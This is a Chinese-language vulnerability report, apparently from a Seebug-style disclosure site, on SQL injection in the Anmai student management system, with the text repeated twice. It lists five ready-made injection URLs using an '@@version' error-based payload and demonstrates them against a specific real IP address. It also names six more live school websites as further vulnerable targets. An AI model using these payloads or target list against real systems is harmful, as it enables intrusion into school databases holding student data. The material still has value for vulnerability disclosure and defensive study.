VULHUB ™

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞#4 ### 详细说明： 5处利用payload分别如下 ``` /Asset/House/HouseInfo_View.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseMaintain_view.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseRebuild_view.aspx?HouseID=1' and @@version=1-- /Asset/House/Newhexiao.aspx?hidsearch=search&housebelong=1' and @@version=1-- /Edis/adminpara/SetGeneralComment.aspx?selgrade=1' and @@version=1-- ``` ### 漏洞证明： 以 http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/House/HouseInfo_View.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/110954443075e0ae9954db4016274cd5f6d81d4c.jpg" alt="QQ截图20150411095941.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/110954443075e0ae9954db4016274cd5f6d81d4c.jpg) http://218.22.96.74:8899/Asset/House/HouseMaintain_view.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/1109552317dc85f62a9c025eca16f23c51765378.jpg"...

### 简要描述： 安脉学生综合管理系统5处SQL注入漏洞#4 ### 详细说明： 5处利用payload分别如下 ``` /Asset/House/HouseInfo_View.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseMaintain_view.aspx?HouseID=1' and @@version=1-- /Asset/House/HouseRebuild_view.aspx?HouseID=1' and @@version=1-- /Asset/House/Newhexiao.aspx?hidsearch=search&housebelong=1' and @@version=1-- /Edis/adminpara/SetGeneralComment.aspx?selgrade=1' and @@version=1-- ``` ### 漏洞证明： 以 http://218.22.96.74:8899 为例进行演示 http://218.22.96.74:8899/Asset/House/HouseInfo_View.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/110954443075e0ae9954db4016274cd5f6d81d4c.jpg" alt="QQ截图20150411095941.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/110954443075e0ae9954db4016274cd5f6d81d4c.jpg) http://218.22.96.74:8899/Asset/House/HouseMaintain_view.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/1109552317dc85f62a9c025eca16f23c51765378.jpg" alt="QQ截图20150411100017.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1109552317dc85f62a9c025eca16f23c51765378.jpg) http://218.22.96.74:8899/Asset/House/HouseRebuild_view.aspx?HouseID=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/110956090134e99e0abaf68819ddb6df9f0ab8e9.jpg" alt="QQ截图20150411100103.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/110956090134e99e0abaf68819ddb6df9f0ab8e9.jpg) http://218.22.96.74:8899/Asset/House/Newhexiao.aspx?hidsearch=search&housebelong=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/11095916f0ced3e7572cf64b26cc151e413f0188.jpg" alt="QQ截图20150411100409.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/11095916f0ced3e7572cf64b26cc151e413f0188.jpg) http://218.22.96.74:8899/Edis/adminpara/SetGeneralComment.aspx?selgrade=1' and @@version=1-- [<img src="https://images.seebug.org/upload/201504/110959551541a4c10a2561dc0657bbf220b18d47.jpg" alt="QQ截图20150411100448.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/110959551541a4c10a2561dc0657bbf220b18d47.jpg) 其他案例还有 http://www.qs2fz.com:8080/ http://218.4.66.18/ http://bssyxxgl.eicbs.com/anmai/ http://www.gxbyzx.cn:88/ANMAI/ http://jmzx.xmedu.cn:9999/ANMAI/ http://119.52.145.27/anmai/